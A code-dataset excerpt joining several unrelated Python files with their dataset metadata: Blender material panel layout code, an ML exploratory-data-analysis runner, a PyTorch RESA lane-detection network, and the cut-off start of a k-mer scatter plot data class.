text=\"Shading\")\n\tif context.object and context.object.type == 'MESH':\n\t\trow.prop_search(tan, \"uv_layer\", context.object.data, \"uv_textures\", text=\"\")\n\telse:\n\t\trow.prop(tan, \"uv_layer\", text=\"\")\n\tcol.label(\"Surface diffuse:\")\n\tcol.prop(tan, \"blend_distance\", text=\"Distance\")\n\ndef shader_indirect_illum_layout(layout, material):\n\tbox = layout.box()\n\tbox.label(text=\"Indirect Illumination Properties\")\n\tif material.type in {'SURFACE', 'WIRE'}:\n\t\tcol = box.column(align=True)\n\t\trow = col.row(align=True)\n\t\trow.prop(material, \"use_shadeless\", text=\"Constant\")\n\t\tcol.active = not material.use_shadeless\n\t\trow.prop(material, \"emit\")\n\t\trow = col.row(align=True)\n\t\trow.prop(material, \"use_tangent_shading\", text=\"Tangent\")\n\t\trow.prop(material, \"ambient\")\n\t\trow = col.row(align=True)\n\t\trow.prop(material, \"use_cubic\", text=\"Cubic \")\n\t\trow.prop(material, \"translucency\")\n\ndef shader_rendering_layout(layout, material):\n\tbox = layout.box()\n\tcol = box.column(align=True)\n\trow = col.row(align=True)\n\trow.label(text=\":: Rendering\")\n\trow.label(text=\"\")\n\n\trow = col.row(align=True)\n\tif not material.use_nodes:\n\t\trow.prop(material, \"use_raytrace\")\n\t\trow.prop(material, \"use_sky\")\n\t\trow = col.row(align=True)\n\t\trow.prop(material, \"use_full_oversampling\", text=\"Oversampling\")\n\trow.prop(material, \"use_mist\")\n\n\tcol = box.column(align=True)\n\trow = col.row(align=True)\n\tif not material.use_nodes:\n\t\trow.prop(material, \"invert_z\")\n\t\tsub = row.row()\n\t\tsub.active = material.use_transparency and material.transparency_method == 'Z_TRANSPARENCY'\n\t\tsub.prop(material, \"offset_z\")\n\n\tcol.separator()\n\trow = col.row(align=True)\n\trow.label(text=\":: Shading\")\n\trow.label(text=\"\")\n\n\trow = col.row(align=True)\n\trow.prop(material, \"use_face_texture\")\n\tsub = row.column()\n\tsub.active = material.use_face_texture\n\tsub.prop(material, \"use_face_texture_alpha\", text=\"Use Alpha\")\n\n\trow = col.row(align=True)\n\trow.prop(material, \"use_vertex_color_paint\")\n\trow.prop(material, \"use_vertex_color_light\")\n\n\trow = col.row(align=True)\n\trow.prop(material, \"use_object_color\")\n\trow.prop(material, \"use_uv_project\")\n\n\trow = col.row(align=True)\n\trow.label(text=\":: Lighting\")\n\trow.label(text=\"\")\n\n\tcol.separator()\n\trow = col.row()\n\trow.prop(material, \"light_group\", text=\"Light Group:\")\n\tif not material.use_nodes:\n\t\trow.prop(material, \"pass_index\")\n\n\trow = col.row(align=True)\n\trow.active = bool(material.light_group)\n\trow.prop(material, \"use_light_group_exclusive\", text=\"Exclusive\")\n\trow.prop(material, \"use_light_group_local\", text=\"Local\")\n\ndef shader_shadow_layout(layout, material):\n\tbox = layout.box()\n\tbox.label(text=\"Shadow Properties\")\n\tif not material.use_nodes:\n\t\tcol = box.column()\n\t\trow = col.row(align=True)\n\t\trow.prop(material, \"use_shadows\", text=\"Receive\")\n\t\trow.prop(material, \"use_cast_shadows\", text=\"Cast\")\n\t\trow = col.row(align=True)\n\t\trow.prop(material, \"use_transparent_shadows\", text=\"Receive Transparent\")\n\t\trow.prop(material, \"use_cast_shadows_only\", text=\"Cast Only\")\n\t\trow = col.row(align=True)\n\t\trow.prop(material, \"use_cast_approximate\")\n\t\trow = col.row(align=True)\n\t\trow.prop(material, \"use_only_shadow\", text=\"Shadows Only\")\n\t\trow.active = material.use_only_shadow\n\t\trow.prop(material, \"shadow_only_type\", text=\"\")\n\t\trow = col.row(align=True)\n\t\trow.prop(material, \"use_cast_buffer_shadows\")\n\t\trow.active = material.use_cast_buffer_shadows\n\t\trow.prop(material, \"shadow_buffer_bias\", text=\"Buffer Bias\")\n\t\trow = col.row(align=True)\n\t\trow.label(text=\"\")\n\t\trow.active = material.use_cast_buffer_shadows\n\t\trow.prop(material, \"shadow_cast_alpha\", text=\"Casting Alpha\")\n\trow = col.row(align=True)\n\trow.prop(material, \"use_ray_shadow_bias\", text=\"Auto Ray Bias\")\n\trow.active = (not material.use_ray_shadow_bias)\n\trow.prop(material, \"shadow_ray_bias\", text=\"Ray Bias\")\n\ndef shader_sss(layout, material):\n\tsss = material.subsurface_scattering\n\tbox = layout.box()\n\tbox.prop(sss, \"use\", text=\"Subsurface Scattering\")\n\n\tif sss.use:\n\t\trow = box.row().split()\n\t\tsub = row.row(align=True).split(align=True, percentage=0.75)\n\t\tsub.menu(\"MATERIAL_MT_sss_presets\", text=bpy.types.MATERIAL_MT_sss_presets.bl_label)\n\t\tsub.operator(\"material.sss_preset_add\", text=\"\", icon='ZOOMIN')\n\t\tsub.operator(\"material.sss_preset_add\", text=\"\", icon='ZOOMOUT').remove_active = True\n\n\t\tsplit = box.split()\n\n\t\tcol = split.column()\n\t\tcol.prop(sss, \"ior\")\n\t\tcol.prop(sss, \"scale\")\n\t\tcol.prop(sss, \"color\", text=\"\")\n\t\tcol.prop(sss, \"radius\", text=\"RGB Radius\", expand=True)\n\n\t\tcol = split.column()\n\t\tsub = col.column(align=True)\n\t\tsub.label(text=\"Blend:\")\n\t\tsub.prop(sss, \"color_factor\", text=\"Color\")\n\t\tsub.prop(sss, \"texture_factor\", text=\"Texture\")\n\t\tsub.label(text=\"Scattering Weight:\")\n\t\tsub.prop(sss, \"front\")\n\t\tsub.prop(sss, \"back\")\n\t\tcol.separator()\n\t\tcol.prop(sss, \"error_threshold\", text=\"Error\")\n\ndef shader_transparency(layout, material):\n\tbox = layout.box()\n\tbox.prop(material, \"use_transparency\", text=\"Transparency\")\n\tif material.use_transparency:\n\t\trt_transparency = material.raytrace_transparency\n\t\trow = box.row()\n\t\trow.active = material.use_transparency\n\t\trow.prop(material, \"transparency_method\", expand=True)\n\n\t\tsplit = box.split()\n\t\tsplit.active = material.use_transparency\n\n\t\tcol = split.column()\n\t\tcol.prop(material, \"alpha\")\n\t\trow = col.row()\n\t\trow.active = (material.transparency_method != 'MASK') and (not material.use_shadeless)\n\t\trow.prop(material, \"specular_alpha\", text=\"Specular\")\n\n\t\tcol = split.column()\n\t\tcol.active = (not material.use_shadeless)\n\t\tcol.prop(rt_transparency, \"fresnel\")\n\t\tsub = col.column()\n\t\tsub.active = (rt_transparency.fresnel > 0.0)\n\t\tsub.prop(rt_transparency, \"fresnel_factor\", text=\"Blend\")\n\n\t\tif material.transparency_method == 'RAYTRACE':\n\t\t\tbox.separator()\n\t\t\tsplit = box.split()\n\t\t\tsplit.active = material.use_transparency\n\n\t\t\tcol = split.column()\n\t\t\tcol.prop(rt_transparency, \"ior\")\n\t\t\tcol.prop(rt_transparency, \"filter\")\n\t\t\tcol.prop(rt_transparency, \"falloff\")\n\t\t\tcol.prop(rt_transparency, \"depth_max\")\n\t\t\tcol.prop(rt_transparency, \"depth\")\n\n\t\t\tcol = split.column()\n\t\t\tcol.label(text=\"Gloss:\")\n\t\t\tcol.prop(rt_transparency, \"gloss_factor\", text=\"Amount\")\n\t\t\tsub = col.column()\n\t\t\tsub.active = rt_transparency.gloss_factor < 1.0\n\t\t\tsub.prop(rt_transparency, \"gloss_threshold\", text=\"Threshold\")\n\t\t\tsub.prop(rt_transparency, \"gloss_samples\", text=\"Samples\")\n\ndef shader_reflection(layout, material):\n\trefl_mat = material.raytrace_mirror\n\tbox = layout.box()\n\tbox.prop(refl_mat, \"use\", text=\"Reflection\")\n\n\tif refl_mat.use:\n\t\tbox.active = refl_mat.use\n\n\t\tsplit = box.split()\n\n\t\tcol = split.column()\n\t\tcol.prop(refl_mat, \"reflect_factor\")\n\t\tcol.prop(material, \"mirror_color\", text=\"\")\n\n\t\tcol = split.column()\n\t\tcol.prop(refl_mat, \"fresnel\")\n\t\tsub = col.column()\n\t\tsub.active = (refl_mat.fresnel > 0.0)\n\t\tsub.prop(refl_mat, \"fresnel_factor\", text=\"Blend\")\n\n\t\tsplit = box.split()\n\n\t\tcol = split.column()\n\t\tcol.separator()\n\t\tcol.prop(refl_mat, \"depth\")\n\t\tcol.prop(refl_mat, \"distance\", text=\"Max Dist\")\n\t\tcol.separator()\n\t\tsub = col.split(percentage=0.4)\n\t\tsub.active = (refl_mat.distance > 0.0)\n\t\tsub.label(text=\"Fade To:\")\n\t\tsub.prop(refl_mat, \"fade_to\", text=\"\")\n\n\t\tcol = split.column()\n\t\tcol.label(text=\"Gloss:\")\n\t\tcol.prop(refl_mat, \"gloss_factor\", text=\"Amount\")\n\t\tsub = col.column()\n\t\tsub.active = (refl_mat.gloss_factor < 1.0)\n\t\tsub.prop(refl_mat, \"gloss_threshold\", text=\"Threshold\")\n\t\tsub.prop(refl_mat, \"gloss_samples\", text=\"Samples\")\n\t\tsub.prop(refl_mat, \"gloss_anisotropic\", text=\"Anisotropic\")\n\ndef material_panel(layout, context):\n\tmaterial = context.active_object.active_material\n\n\tob = context.active_object\n\tis_sortable = (len(ob.material_slots) > 1)\n\trows = 1\n\tif is_sortable:\n\t\trows = 4\n\tlayout.template_list(\"MATERIAL_UL_matslots\", \"\", ob, \"material_slots\", ob, \"active_material_index\", rows=rows)\n\tlayout.template_ID(ob, \"active_material\", new=\"material.new\")\n\n\tif material!= None:\n\t\tscene = context.scene\n\t\tob = context.active_object\n\n\t\tdiff_texture_slot = material.texture_slots[0]\n\t\tspec_texture_slot = material.texture_slots[1]\n\t\tnrml_texture_slot = material.texture_slots[2]\n\t\trefl_texture_slot = material.texture_slots[3]\n\t\ttrns_texture_slot = material.texture_slots[4]\n\n\t\tshader_property_layout(context, layout, material)\n\n\t\t##########################################################\n\t\t# DIFFUSE PORT\n\t\t##########################################################\n\t\tsplit = layout.split(percentage=0.1)\n\t\trow = split.row(align=True)\n\t\trow.prop(material, \"diffuse_color\", text=\"\")\n\t\trow = split.row(align=True)\n\t\trow.prop(material, \"diffuse_shader\", text=\"\")\n\t\trow.prop(material, \"diffuse_intensity\", text=\"Intensity\")\n\t\tcol = layout.column(align=True)\n\t\trow = col.row(align=True)\n\t\trow.operator(\"wm.bsi_decorator_button\", text=\"DIFFUSE PORT\", emboss=False)\n\n\t\trow.prop( material.BSI, \"diff_image\", text=\"\",\n\t\t\t\t icon=('TEXTURE'\n\t\t\t\t\t\t\t\tif material.BSI.diff_image\n\t\t\t\t\t\t\t\telse 'IMASEL' ),\n\t\t\t\t emboss=False)\n\n\t\trow.prop( material.BSI, \"diff_uvs\", text=\"\",\n\t\t\t\t icon_value=(ico[\"uv_conn\"].icon_id\n\t\t\t\t\t\t\t\tif material.BSI.diff_uvs\n\t\t\t\t\t\t\t\telse ico[\"uv\"].icon_id ),\n\t\t\t\t emboss=False)\n\n\t\trow.prop( material.BSI, \"diff_sampling\", text=\"\",\n\t\t\t\t icon_value=(ico[\"sampling_on\"].icon_id\n\t\t\t\t\t\t\t\tif material.BSI.diff_sampling\n\t\t\t\t\t\t\t\telse ico[\"sampling_off\"].icon_id ),\n\t\t\t\t emboss=False)\n\n\t\trow.prop( material.BSI, \"diff_influence\", text=\"\",\n\t\t\t\t icon_value=(ico[\"influences_on\"].icon_id\n\t\t\t\t\t\t\t\tif material.BSI.diff_influence\n\t\t\t\t\t\t\t\telse ico[\"influences_off\"].icon_id ),\n\t\t\t\t emboss=False)\n\n\t\trow.prop( material.BSI, \"diff_ramp\", text=\"\",\n\t\t\t\t icon_value=(ico[\"ramp_on\"].icon_id\n\t\t\t\t\t\t\t\tif material.BSI.diff_ramp\n\t\t\t\t\t\t\t\telse ico[\"ramp_off\"].icon_id ),\n\t\t\t\t emboss=False)\n\n\t\tif material.BSI.diff_image:\n\t\t\tif diff_texture_slot != None:\n\t\t\t\tcol = layout.column(align=True)\n\t\t\t\trow = col.row(align=True)\n\n\t\t\t\tdiff_port = row.operator(\"bsi.apply_texture_image\", text=\"Re-Apply New Diffuse Image\")\n\t\t\t\tdiff_port.mat_port_type = \"diffuse\"\n\n\t\t\t\tprop = row.operator(\"bsi.clear_texture_slot\" ,text=\"\",icon = 'X', emboss=True)\n\t\t\t\tprop.port_type= \"diffuse\"\n\n\t\t\t\trow = col.row(align=True)\n\t\t\t\trow.label(text=\"\") #spacer align to the right\n\t\t\t\trow.prop(material.BSI, \"diff_img_display\", text=\"\",\n\t\t\t\t\t\t icon=('VISIBLE_IPO_ON'\n\t\t\t\t\t\t\t\t\t\tif material.BSI.diff_img_display\n\t\t\t\t\t\t\t\t\t\telse 'VISIBLE_IPO_OFF'),\n\t\t\t\t\t\t emboss=False)\n\t\t\t\tif material.BSI.diff_img_display:\n\t\t\t\t\tbox = layout.box()\n\t\t\t\t\tbox.label(text=\"UGLY BLENDER DESIGN---> CAN'T FIX\")\n\t\t\t\t\tbox.template_image(diff_texture_slot.texture, \"image\", diff_texture_slot.texture.image_user)\n\t\t\telse:\n\t\t\t\tdiff_port = layout.operator(\"bsi.apply_texture_image\", text=\"Load Diffuse Image\")\n\t\t\t\tdiff_port.mat_port_type = \"diffuse\"\n\n\t\tif material.BSI.diff_uvs:\n\t\t\tif diff_texture_slot != None:\n\t\t\t\tuv_projection_layout(layout, diff_texture_slot, ob)\n\t\t\t\tuv_tiling_layout(layout, diff_texture_slot.texture)\n\n\t\t\telse:\n\t\t\t\tlayout.label(text=\"No Texture Connection\")\n\n\t\tif material.BSI.diff_sampling:\n\t\t\tif diff_texture_slot != None:\n\t\t\t\ttexture_sampling_layout(layout, diff_texture_slot)\n\t\t\telse:\n\t\t\t\tlayout.label(text=\"No Texture Connection\")\n\n\t\tif material.BSI.diff_influence:\n\t\t\tif diff_texture_slot != None:\n\t\t\t\ttexture_influence_layout(layout, diff_texture_slot, port_type=\"diffuse\")\n\t\t\telse:\n\t\t\t\tlayout.label(text=\"No Texture Connection\")\n\n\t\tif material.BSI.diff_ramp:\n\t\t\tshader_ramp_layout(layout, material)\n\t\t##########################################################\n\t\t# SPECULAR PORT\n\t\t##########################################################\n\t\tsplit = layout.split(percentage=0.1)\n\t\trow = split.row(align=True)\n\t\trow.prop(material, \"specular_color\", text=\"\")\n\t\trow = split.row(align=True)\n\t\trow.prop(material, \"specular_shader\", text=\"\")\n\t\trow.prop(material, \"specular_intensity\", text=\"Intensity\")\n\n\t\tcol = layout.column(align=True)\n\t\trow = col.row(align=True)\n\t\trow.operator(\"wm.bsi_decorator_button\", text=\"SPECULAR PORT\", emboss=False)\n\n\t\trow.prop( material.BSI, \"spec_image\", text=\"\",\n\t\t\t\t icon=('TEXTURE'\n\t\t\t\t\t\t\t\tif material.BSI.spec_image\n\t\t\t\t\t\t\t\telse 'IMASEL' ),\n\t\t\t\t emboss=False)\n\t\trow.prop( material.BSI, \"spec_uvs\", text=\"\",\n\t\t\t\t icon_value=(ico[\"uv_conn\"].icon_id\n\t\t\t\t\t\t\t\tif material.BSI.spec_uvs\n\t\t\t\t\t\t\t\telse ico[\"uv\"].icon_id ),\n\t\t\t\t emboss=False)\n\n\t\trow.prop( material.BSI, \"spec_sampling\", text=\"\",\n\t\t\t\t icon_value=(ico[\"sampling_on\"].icon_id\n\t\t\t\t\t\t\t\tif material.BSI.spec_sampling\n\t\t\t\t\t\t\t\telse ico[\"sampling_off\"].icon_id ),\n\t\t\t\t emboss=False)\n\n\t\trow.prop( material.BSI, \"spec_influence\", text=\"\",\n\t\t\t\t icon_value=(ico[\"influences_on\"].icon_id\n\t\t\t\t\t\t\t\tif material.BSI.spec_influence\n\t\t\t\t\t\t\t\telse ico[\"influences_off\"].icon_id ),\n\t\t\t\t emboss=False)\n\n\t\trow.prop( material.BSI, \"spec_ramp\", text=\"\",\n\t\t\t\t icon_value=(ico[\"ramp_on\"].icon_id\n\t\t\t\t\t\t\t\tif material.BSI.spec_ramp\n\t\t\t\t\t\t\t\telse ico[\"ramp_off\"].icon_id ),\n\t\t\t\t emboss=False)\n\n\t\tif material.BSI.spec_image:\n\t\t\tif spec_texture_slot != None:\n\t\t\t\tcol = layout.column(align=True)\n\t\t\t\trow = col.row(align=True)\n\n\t\t\t\tspec_port = row.operator(\"bsi.apply_texture_image\", text=\"Re-Apply New Specular Image\")\n\t\t\t\tspec_port.mat_port_type = \"specular\"\n\n\t\t\t\tprop = row.operator(\"bsi.clear_texture_slot\" ,text=\"\",icon = 'X', emboss=True)\n\t\t\t\tprop.port_type= \"specular\"\n\n\t\t\t\trow = col.row(align=True)\n\t\t\t\trow.label(text=\"\") #spacer align to the right\n\t\t\t\trow.prop(material.BSI, \"spec_img_display\", text=\"\",\n\t\t\t\t\t\t icon=('VISIBLE_IPO_ON'\n\t\t\t\t\t\t\t\t\t\tif material.BSI.spec_img_display\n\t\t\t\t\t\t\t\t\t\telse 'VISIBLE_IPO_OFF'),\n\t\t\t\t\t\t emboss=False)\n\t\t\t\tif material.BSI.spec_img_display:\n\t\t\t\t\tbox = layout.box()\n\t\t\t\t\tbox.label(text=\"UGLY BLENDER DESIGN---> CAN'T FIX\")\n\t\t\t\t\tbox.template_image(spec_texture_slot.texture, \"image\", spec_texture_slot.texture.image_user)\n\t\t\telse:\n\t\t\t\tspec_port = layout.operator(\"bsi.apply_texture_image\", text=\"Load Specular Image\")\n\t\t\t\tspec_port.mat_port_type = \"specular\"\n\n\t\tif material.BSI.spec_uvs:\n\t\t\tif spec_texture_slot != None:\n\t\t\t\tuv_projection_layout(layout, spec_texture_slot, ob)\n\t\t\t\tuv_tiling_layout(layout, spec_texture_slot.texture)\n\n\t\t\telse:\n\t\t\t\tlayout.label(text=\"No Texture Connection\")\n\n\t\tif material.BSI.spec_sampling:\n\t\t\tif spec_texture_slot != None:\n\t\t\t\ttexture_sampling_layout(layout, spec_texture_slot)\n\t\t\telse:\n\t\t\t\tlayout.label(text=\"No Texture Connection\")\n\n\t\tif material.BSI.spec_influence:\n\t\t\tif spec_texture_slot != None:\n\t\t\t\ttexture_influence_layout(layout, spec_texture_slot, port_type=\"specular\")\n\t\t\telse:\n\t\t\t\tlayout.label(text=\"No Texture Connection\")\n\n\t\tif material.BSI.spec_ramp:\n\t\t\tshader_ramp_layout(layout, material)\n\t\t##########################################################\n\t\t# NORMAL - BUMP PORT\n\t\t##########################################################\n\t\tsplit = layout.split(percentage=0.1)\n\t\trow = split.row(align=True)\n\t\trow.prop(material, \"diffuse_color\", text=\"\")\n\t\trow = split.row(align=True)\n\t\trow.prop(material, \"diffuse_shader\", text=\"\")\n\t\trow.prop(material, \"diffuse_intensity\", text=\"Intensity\")\n\t\tcol = layout.column(align=True)\n\t\trow = col.row(align=True)\n\t\trow.operator(\"wm.bsi_decorator_button\", text=\"BUMP PORT\", emboss=False)\n\n\t\trow.prop( material.BSI, \"spec_image\", text=\"\",\n\t\t\t\t icon=('TEXTURE'\n\t\t\t\t\t\t\t\tif material.BSI.spec_image\n\t\t\t\t\t\t\t\telse 'IMASEL' ),\n\t\t\t\t emboss=False)\n\t\trow.prop( material.BSI, \"spec_uvs\", text=\"\",\n\t\t\t\t icon_value=(ico[\"uv_conn\"].icon_id\n\t\t\t\t\t\t\t\tif material.BSI.spec_uvs\n\t\t\t\t\t\t\t\telse ico[\"uv\"].icon_id ),\n\t\t\t\t emboss=False)\n\n\t\trow.prop( material.BSI, \"spec_sampling\", text=\"\",\n\t\t\t\t icon_value=(ico[\"sampling_on\"].icon_id\n\t\t\t\t\t\t\t\tif material.BSI.spec_sampling\n\t\t\t\t\t\t\t\telse ico[\"sampling_off\"].icon_id ),\n\t\t\t\t emboss=False)\n\n\t\trow.prop( material.BSI, \"spec_influence\", text=\"\",\n\t\t\t\t icon_value=(ico[\"influences_on\"].icon_id\n\t\t\t\t\t\t\t\tif material.BSI.spec_influence\n\t\t\t\t\t\t\t\telse ico[\"influences_off\"].icon_id ),\n\t\t\t\t emboss=False)\n\n\t\trow.prop( material.BSI, \"spec_ramp\", text=\"\",\n\t\t\t\t icon_value=(ico[\"ramp_on\"].icon_id\n\t\t\t\t\t\t\t\tif material.BSI.spec_ramp\n\t\t\t\t\t\t\t\telse ico[\"ramp_off\"].icon_id ),\n\t\t\t\t emboss=False)\n\n# def bl_shading_panel(layout):\n# \tcontext = bpy.context\n# \tview = context.space_data\n# \tscene = context.scene\n# \tgs = scene.game_settings\n# \tobj = context.object\n\n# \tcol = layout.column()\n\n# \tif not scene.render.use_shading_nodes:\n# \t\tcol.prop(gs, \"material_mode\", text=\"\")\n\n# \tif view.viewport_shade == 'SOLID':\n# \t\tcol.prop(view, \"show_textured_solid\")\n# \t\tcol.prop(view, \"use_matcap\")\n# \t\tif view.use_matcap:\n# \t\t\tcol.template_icon_view(view, \"matcap_icon\")\n# \telif view.viewport_shade == 'TEXTURED':\n# \t\tif scene.render.use_shading_nodes or gs.material_mode != 'GLSL':\n# \t\t\tcol.prop(view, \"show_textured_shadeless\")\n\n# \tcol.prop(view, \"show_backface_culling\")\n\n# \tif view.viewport_shade not in {'BOUNDBOX', 'WIREFRAME'}:\n# \t\tif obj and obj.mode == 'EDIT':\n# \t\t\tcol.prop(view, \"show_occlude_wire\")\n\n# \tfx_settings = view.fx_settings\n\n# \tif view.viewport_shade not in {'BOUNDBOX', 'WIREFRAME'}:\n# \t\tsub = col.column()\n# \t\tsub.active = view.region_3d.view_perspective == 'CAMERA'\n# \t\tsub.prop(fx_settings, \"use_dof\")\n# \t\tcol.prop(fx_settings, \"use_ssao\", text=\"Ambient Occlusion\")\n# \t\tif fx_settings.use_ssao:\n# \t\t\tssao_settings = fx_settings.ssao\n# \t\t\tsubcol = col.column(align=True)\n# \t\t\tsubcol.prop(ssao_settings, \"factor\")\n# \t\t\tsubcol.prop(ssao_settings, \"distance_max\")\n# \t\t\tsubcol.prop(ssao_settings, \"attenuation\")\n# \t\t\tsubcol.prop(ssao_settings, \"samples\")\n# \t\t\tsubcol.prop(ssao_settings, \"color\")\n\n","sub_path":"tools/anki_scene_exporter/ui/panel_layouts.py","file_name":"panel_layouts.py","file_ext":"py","file_size_in_byte":50210,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"577500077","text":"# Copyright 2019 Google Inc. All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\n\"\"\"Module holding the class of main interface of running analysis\"\"\"\n\nfrom __future__ import absolute_import\nfrom __future__ import print_function\n\nimport os\nimport argparse\nimport logging\nimport time\n\nfrom ml_eda.analysis import qualitative_analysis\nfrom ml_eda.analysis import quantitative_analysis\nfrom ml_eda.analysis import descriptive_analysis\nfrom ml_eda.metadata import metadata_loader\nfrom ml_eda.metadata import run_metadata_pb2\nfrom ml_eda.preprocessing import preprocessor_factory\nfrom ml_eda.orchestration.analysis_tracker import AnalysisTracker\nfrom ml_eda.reporting import report_generator\n\n\nclass Run:\n \"\"\"Class of main interface for running analysis\"\"\"\n _run_metadata = run_metadata_pb2.AnalysisRun()\n\n def __init__(self, config_params: argparse.ArgumentParser):\n # Parameter from CLI\n self._config_params = config_params\n self._run_metadata.timestamp_sec = time.time()\n\n # Load data definition\n self._metadata_def = metadata_loader.load_metadata_def(\n self._config_params)\n self._run_metadata.datasource.CopyFrom(self._metadata_def.datasource)\n self.tracker = AnalysisTracker(self._metadata_def)\n\n self.report_path = self._config_params.report_path\n self.figure_path = os.path.join(os.path.dirname(self.report_path),\n 'figure')\n if not os.path.exists(self.figure_path):\n os.makedirs(self.figure_path)\n\n logging.info(self._metadata_def.datasource)\n\n def _run_descriptive(self):\n \"\"\"Run descriptive analysis for both numerical and\n categorical attributes.\"\"\"\n analyzer = descriptive_analysis.DescriptiveAnalysis(\n self._metadata_def,\n preprocessor_factory.PreprocessorFactory.new_preprocessor(\n self._config_params))\n\n analyses = list()\n\n analyses.extend(analyzer.run_numerical_descriptive())\n analyses.extend(\n analyzer.run_numerical_histograms(self._metadata_def.histogram_bin))\n\n analyses.extend(analyzer.run_categorical_descriptive())\n vc_limit = self._metadata_def.value_counts_limit\n analyses.extend(analyzer.run_value_counts(vc_limit))\n\n for item in analyses:\n self.tracker.add_analysis(item)\n\n return analyses\n\n def _categorical_cardinality_check(self):\n \"\"\"Check whether the cardinality of the categorical columns are within\n the specified threshold.\"\"\"\n\n def _get_cardinality(attribute):\n descrip_analysis = self.tracker.get_attribute_analysis(\n attribute_name=attribute.name,\n analysis_name=run_metadata_pb2.Analysis.Name.Name(\n run_metadata_pb2.Analysis.DESCRIPTIVE)\n )\n for metric in descrip_analysis[0].smetrics:\n if metric.name == run_metadata_pb2.ScalarMetric.CARDINALITY:\n return metric.value\n return None\n\n valid_list = []\n\n for att in self._metadata_def.categorical_attributes:\n cardinality = _get_cardinality(att)\n if cardinality <= self._metadata_def.general_cardinality_limit:\n valid_list.append(att)\n\n self._metadata_def.update_low_card_categorical(valid_list)\n\n def _run_qualitative(self):\n \"\"\"Run correlation qualitative analysis for combinations of numerical\n and categorical attributes\"\"\"\n analyzer = qualitative_analysis.QualitativeAnalysis(\n self._metadata_def,\n preprocessor_factory.PreprocessorFactory.new_preprocessor(\n self._config_params))\n\n analyses = list()\n if self._metadata_def.contingency_table_run:\n analyses.extend(analyzer.run_contigency_table())\n if self._metadata_def.table_descriptive_run:\n analyses.extend(analyzer.run_categorical_numerical_descriptive())\n\n for item in analyses:\n self.tracker.add_analysis(item)\n\n return analyses\n\n def _run_quantitative(self):\n \"\"\"Run correlation quantitative analysis for combinations of numerical\n and categorical attributes\"\"\"\n analyzer = quantitative_analysis.QuantitativeAnalysis(\n self._metadata_def,\n preprocessor_factory.PreprocessorFactory.new_preprocessor(\n self._config_params))\n\n analyses = []\n if self._metadata_def.pearson_corr_run:\n analyses.extend(analyzer.run_pearson_correlation())\n if self._metadata_def.information_gain_run:\n analyses.extend(analyzer.run_information_gain())\n if self._metadata_def.chi_square_run:\n analyses.extend(analyzer.run_chi_square())\n if self._metadata_def.anova_run:\n analyses.extend(analyzer.run_anova())\n\n for item in analyses:\n self.tracker.add_analysis(item)\n\n return analyses\n\n def run_exploratory_data_analysis(self):\n \"\"\"Run the main exploratory data analysis loop.\"\"\"\n\n self._run_metadata.analyses.extend(self._run_descriptive())\n self._categorical_cardinality_check()\n self._run_metadata.analyses.extend(self._run_qualitative())\n self._run_metadata.analyses.extend(self._run_quantitative())\n\n # pylint: disable-msg=logging-format-interpolation\n logging.info(\"Numerical attributes: {}\\nCategorical attributes: {}\".format(\n self.tracker.get_numerical_attributes(),\n self.tracker.get_categorical_attributes()\n ))\n logging.info('All analysis:\\n{}'.format(\n self.tracker.get_all_analysis_unique_names()))\n\n report = report_generator.create_report_md_content(\n analysis_tracker=self.tracker,\n figure_base_path=self.figure_path)\n\n logging.info(report)\n with open(self.report_path, 'w') as wf:\n wf.write(report)\n","sub_path":"tools/ml-auto-eda/ml_eda/orchestration/analysis_run.py","file_name":"analysis_run.py","file_ext":"py","file_size_in_byte":6115,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"196097105","text":"# Adapted from ZJULearning/resa\n# Better to use a decoupled implementation,\n# costs more codes, but clear\nimport torch.nn as nn\nfrom ..common_models import RESA, RESAReducer, BUSD, EDLaneExist\nfrom .._utils import IntermediateLayerGetter\nfrom .. import resnet\n\n\nclass RESANet(nn.Module):\n def __init__(self, num_classes, backbone_name, flattened_size, channel_reduce, pretrained_backbone=True):\n super(RESANet, self).__init__()\n backbone = resnet.__dict__[backbone_name](\n pretrained=pretrained_backbone,\n replace_stride_with_dilation=[False, True, True])\n return_layers = {'layer4': 'out'}\n self.backbone = IntermediateLayerGetter(backbone, return_layers=return_layers)\n in_channels = 2048 if backbone_name == 'resnet50' or backbone_name == 'resnet101' else 512\n self.channel_reducer = RESAReducer(in_channels=in_channels, reduce=channel_reduce)\n self.spatial_conv = RESA()\n self.decoder = BUSD(num_classes=num_classes)\n self.lane_classifier = EDLaneExist(num_output=num_classes - 1, flattened_size=flattened_size)\n\n def forward(self, x):\n x = self.backbone(x)['out']\n x = self.channel_reducer(x)\n x = self.spatial_conv(x)\n\n res = {'out': self.decoder(x),\n 'lane': self.lane_classifier(x)}\n\n return res\n","sub_path":"torchvision_models/lane_detection/resa.py","file_name":"resa.py","file_ext":"py","file_size_in_byte":1344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"69"} +{"seq_id":"329693333","text":"from src.processing import Processing\nimport pandas as pd\n\n\n# inherits from process\nclass KMerScatterPlotData(Processing):\n\n def __init__(self, data, selected, k, peak, top, feature, cmd, sec_struct_data, no_sec_peak):\n super().__init__(data, selected, k, peak, top, feature, cmd, sec_struct_data, no_sec_peak)\n\n # processes data to display k-mer according their frequency later\n def processData(self):\n top_kmer = self.getTopKmer()\n data = self.getDF() # get top k-mer\n threshold = 0.01\n\n file_name1 = data.columns.tolist()[0] # get column names\n file_name2 = data.columns.tolist()[1]\n\n x_axis = data[file_name1].tolist()\n y_axis = data[file_name2].tolist()\n label = data.index.tolist()\n\n result_df = pd.DataFrame(x_axis, index=label, columns=[file_name1])\n result_df[file_name2] = y_axis\n\n k = self.getSettings().getK()\n\n top_kmer_dict = dict.fromkeys(top_kmer.index.tolist(), True) # set highlight-entries on true for max-k-mere\n all_kmer_dict = dict.fromkeys(result_df.index.tolist(), False)\n all_kmer_dict.update(top_kmer_dict)\n\n result_df['highlight'] = [\"TOP {}-mer\".format(k) if all_kmer_dict[kmer] else \"{}-mer\".format(k) for\n kmer in result_df.index.tolist()] # save highlight-values for 